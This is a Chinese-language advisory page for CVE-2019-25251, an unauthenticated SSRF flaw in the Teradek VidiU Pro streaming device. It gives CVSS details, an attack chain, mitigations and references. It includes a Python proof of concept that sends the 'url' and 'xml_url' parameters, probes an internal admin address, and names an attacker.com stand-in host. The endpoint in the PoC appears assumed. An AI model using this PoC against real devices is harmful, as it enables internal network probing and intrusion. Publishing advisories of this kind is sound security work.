CVE-2019-25251 Teradek VidiU Pro SSRF服务器端请求伪造漏洞

漏洞信息

漏洞编号

CVE-2019-25251

漏洞类型

服务器端请求伪造(SSRF)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Teradek VidiU Pro

漏洞概述

CVE-2019-25251是Teradek VidiU Pro设备中发现的一个服务器端请求伪造（SSRF）漏洞。该漏洞存在于设备的管理界面中，影响版本为3.0.3。攻击者可以通过操纵GET参数'url'和'xml_url'来触发此漏洞，无需任何认证即可利用。由于该漏洞允许攻击者伪造服务器端请求，攻击者可以绕过防火墙限制，发起内网网络枚举，甚至向任意目标触发外部HTTP请求。这不仅可能导致敏感信息泄露，还可能被用于对内部系统进行进一步攻击。Teradek VidiU Pro是一款专业级的实时视频流传输设备，广泛应用于广播、直播和视频制作领域。该漏洞的CVSS评分为6.5，属于中等严重程度，但由于其无需认证即可利用的特性，实际威胁程度不容忽视。

技术细节

该漏洞属于典型的服务器端请求伪造（SSRF）类型，存在于Teradek VidiU Pro的管理接口中。漏洞的核心问题在于应用程序对用户提供的URL参数缺乏充分的验证和过滤。攻击者可以通过构造恶意的URL参数值（如'url'和'xml_url'），使服务器向攻击者指定的目标地址发起HTTP请求。由于请求是由服务器端发起的，攻击者可以利用这种特性进行以下操作：首先，扫描内网端口和服务，发现内部网络拓扑结构；其次，访问本应无法从外部访问的内部资源；最后，通过服务器作为代理向目标系统发起进一步攻击。从CVSS向量来看，该漏洞具有网络可达性（AV:N）、低攻击复杂度（AC:L）、无需权限（PR:N）、无需用户交互（UI:N）的特点，影响范围包括机密性（C:L）和完整性（I:L），但对可用性无影响（A:N）。

攻击链分析

STEP 1

步骤1

攻击者发现Teradek VidiU Pro设备的管理界面，该界面无需认证即可访问

STEP 2

步骤2

攻击者识别出存在SSRF漏洞的API端点，通常位于配置或设置功能模块

STEP 3

步骤3

攻击者构造恶意请求，通过'url'或'xml_url'参数指定目标URL，可以是内网地址或外部系统

STEP 4

步骤4

服务器接收请求后，会向攻击者指定的目标地址发起HTTP请求，从而绕过网络边界限制

STEP 5

步骤5

攻击者通过响应内容或响应时间判断内部服务状态，实现内网端口扫描和服务探测

STEP 6

步骤6

利用获取的内网信息，攻击者可以进一步对内部系统发起攻击或窃取敏感数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2019-25251 SSRF PoC - Teradek VidiU Pro
# Target: Teradek VidiU Pro management interface
# Vulnerability: SSRF via 'url' and 'xml_url' GET parameters

import requests
import sys

def exploit_ssrf(target_url, attackercontrolled_url):
    """
    Exploit SSRF vulnerability in Teradek VidiU Pro
    target_url: Base URL of the vulnerable device
    attackercontrolled_url: URL to make the server request
    """
    
    # Target endpoint for SSRF
    endpoint = "/api/config"
    
    # Method 1: Using 'url' parameter
    params_url = {
        'url': attackercontrolled_url
    }
    
    # Method 2: Using 'xml_url' parameter  
    params_xml_url = {
        'xml_url': attackercontrolled_url
    }
    
    print(f"[*] Targeting: {target_url}")
    print(f"[*] Attacker controlled URL: {attackercontrolled_url}")
    
    # Send exploit requests
    try:
        print("[*] Sending SSRF payload via 'url' parameter...")
        response1 = requests.get(target_url + endpoint, params=params_url, timeout=10)
        print(f"[+] Response status: {response1.status_code}")
        
        print("[*] Sending SSRF payload via 'xml_url' parameter...")
        response2 = requests.get(target_url + endpoint, params=params_xml_url, timeout=10)
        print(f"[+] Response status: {response2.status_code}")
        
        # Example: Internal port scanning
        print("[*] Example: Scanning internal service...")
        internal_target = "http://192.168.1.1:8080/admin"
        scan_params = {'url': internal_target}
        requests.get(target_url + endpoint, params=scan_params, timeout=5)
        
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve-2019-25251.py <target_url> <attacker_url>")
        print("Example: python cve-2019-25251.py http://vidiu-pro.local http://attacker.com/malicious")
        sys.exit(1)
    
    exploit_ssrf(sys.argv[1], sys.argv[2])

影响范围

Teradek VidiU Pro 3.0.3

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）将Teradek VidiU Pro的管理接口与公网隔离，仅允许通过VPN或受信任的网络进行访问；2）在网络边界部署严格的访问控制策略，限制对管理端口的访问；3）启用设备的入侵检测功能，监控异常的请求模式；4）定期检查设备日志，及时发现可疑活动；5）如果业务允许，考虑暂时禁用管理界面的远程访问功能，仅允许本地访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2019-25251
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2019-25251
3 Details https://www.cvedetails.com/cve/CVE-2019-25251/
4 VulDB https://vuldb.com/cve/CVE-2019-25251
5 Link https://www.exploit-db.com/exploits/44672
6 Link https://www.teradek.com
7 Link https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5461.php
8 Link https://www.exploit-db.com/exploits/44672
9 Link https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5461.php